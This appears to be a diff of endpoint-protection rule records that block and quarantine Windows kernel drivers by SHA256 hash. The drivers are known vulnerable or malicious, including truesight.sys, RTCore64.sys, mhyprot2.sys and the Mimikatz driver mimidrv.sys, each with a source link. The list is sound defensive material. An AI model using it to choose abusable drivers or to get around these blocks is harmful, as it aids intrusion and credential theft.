+ "hl_testing_start_time": "2026-03-23T11:45:30.481684Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba6c0c9b64fa739158b5f4465d53e67e574e4b954c8e143cf4e299f5daa65b60",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9bfa9bf-80d9-5f82-a1a6-0147c127de56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480562Z",
+ "creation_date": "2026-03-23T11:45:30.480564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cf84400c09582ee2911a5b1582332c992d1cd29fcf811cb1dc00fcd61757db0",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9e1984c-cab7-5536-adcd-7ba3f9271911",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607852Z",
+ "creation_date": "2026-03-23T11:45:29.607853Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607859Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2d8dd5dacc24051709f55a35184f5f99aef957a83bd358b0608b4479e1ec24f",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9eceb03-de44-5663-986c-25a5e05787f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984226Z",
+ "creation_date": "2026-03-23T11:45:29.984228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c9dc878d9605070921338d09c6dbecbe11dec50c03fc69a0462884a07c2c442",
+ "comment": "Vulnerable Kernel Driver (aka AsrOmgDrv.sys) [https://www.loldrivers.io/drivers/3f39af20-802a-4909-a5de-7f6fe7aab350/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da0e13ab-28c0-530c-a1b0-7ea3865f8f02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826120Z",
+ "creation_date": "2026-03-23T11:45:31.826122Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826127Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6a3cda1283cdcbb4599eb0a3337838f61a70c1c0f34bc22c4b97d2c6a19a863",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da157e58-904b-5296-bcc9-418f4efbcfd4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.139994Z",
+ "creation_date": "2026-03-23T11:45:31.140011Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35220d414d92ef023084dde1a8f12c1c2f645b2342a7d18848d48d630f283760",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da42cb82-e009-5157-a5be-7abd6861476b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144193Z",
+ "creation_date": "2026-03-23T11:45:31.144195Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144200Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "426e74e8d62706d5f063c87f4de38d2269db432080b43df8939c026ec9e055e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da45f9d6-b9f3-5de3-b4a9-231f9e6edca6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814981Z",
+ "creation_date": "2026-03-23T11:45:31.814984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814994Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d3321a84669f27c4f53894496a1d57532032c99732a526422a4e641662b4d6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da4743f8-23c8-53df-a06e-2e1875f3c470",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829469Z",
+ "creation_date": "2026-03-23T11:45:31.829471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd74124e2e524ad2ab52444ac56184a33fd5a3df185c7ae71b29b1c86a316c2d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da4b9f77-9b6a-5482-b2f7-89794bfb3c68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454710Z",
+ "creation_date": "2026-03-23T11:45:30.454713Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "342cf884840fc2b48c96398f690a1801ed8ac1ea59305af9e3d070d13ef85601",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot2.sys) [https://www.loldrivers.io/drivers/57354c82-ff9c-4a54-8377-d195e4ff0a26/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da4c3454-bc7d-53f6-9e11-87dbe8dc0453",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829330Z",
+ "creation_date": "2026-03-23T11:45:31.829334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829343Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9f9d255e6405b4fa0ac9baf8776b3f0d9ab302ec7f78f12efdb4399c146983d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da51fe4e-21e4-503f-8f87-5b7eec767fb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604503Z",
+ "creation_date": "2026-03-23T11:45:29.604505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea80d2e65b03ea918f918d60cc8397aa4ee11eeb7bf679c7813311ff32ed5c81",
+ "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da5817a5-e459-54f0-b3c7-720c6d4d80ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489477Z",
+ "creation_date": "2026-03-23T11:45:31.489480Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489487Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cb2fa8795007c4d8c2079d40ee1b9006ad708bd08492b37b3bbae486d7ab7e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da58922d-e475-5a29-b7ff-d001ac8dfac8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827238Z",
+ "creation_date": "2026-03-23T11:45:31.827241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44fb4cef87bb15c279ec223d2c378de4aea56bbd8277f2f8b3cfec7586c84f4e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da592dab-86f7-566d-9802-0c4de699aa56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980681Z",
+ "creation_date": "2026-03-23T11:45:29.980683Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fec1c641c7151e931aeb0d1ac59a97d6d3b486c482c1df8794e6424e75e6da1a",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da657a56-8e84-50d7-b106-28e81106d396",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829604Z",
+ "creation_date": "2026-03-23T11:45:30.829607Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829616Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9699b885bfce9a6fc0b48484adddd58df1a5ed8161adae1ed58dca1c20c2ea40",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da6b46b5-9843-51de-9971-2c81730ca5b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817215Z",
+ "creation_date": "2026-03-23T11:45:30.817217Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817222Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33d7046a5d41f4010ad5df632577154ed223dac2ab0ca2da57dbf1724db45a57",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da6bd2d0-af9b-5f53-b2bc-5f7d9f50829b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157353Z",
+ "creation_date": "2026-03-23T11:45:31.157355Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e926e55b953059fa579205ab3f550ef4e6a3f811f8f22cc31e3f6fcabbb7e6ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da761c25-3c8b-5809-a823-955365e3f345",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608299Z",
+ "creation_date": "2026-03-23T11:45:29.608301Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608307Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56",
+ "comment": "Malicious Kernel Driver (aka hlpdrv.sys) [https://news.sophos.com/en-us/2025/12/06/inside-shanya-a-packer-as-a-service-fueling-modern-attacks/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da811f79-1969-5bb5-8709-6654fadfeafd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819725Z",
+ "creation_date": "2026-03-23T11:45:30.819727Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bfd24947052bfe9f2979113a7941e40bd7e3a82eaa081a32ad4064159f07c91",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da8af7b7-67b7-5af7-95ce-0d4299fc5b0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829376Z",
+ "creation_date": "2026-03-23T11:45:30.829378Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28a7b5e4850c742cda67a352f4bf078ca9edcb2fbeb1475b3bca565385880219",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da9de128-f8df-5504-8f20-6632376dc6e4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970511Z",
+ "creation_date": "2026-03-23T11:45:29.970513Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "443c0ba980d4db9213b654a45248fd855855c1cc81d18812cae9d16729ff9a85",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dae00cbc-5630-5df5-98b4-b5258e70c9b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824243Z",
+ "creation_date": "2026-03-23T11:45:31.824246Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824255Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b150744e6f91a6bfba549ebcc0dd1bf3a8cd16c841abd954a876bbdf811d1fa2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
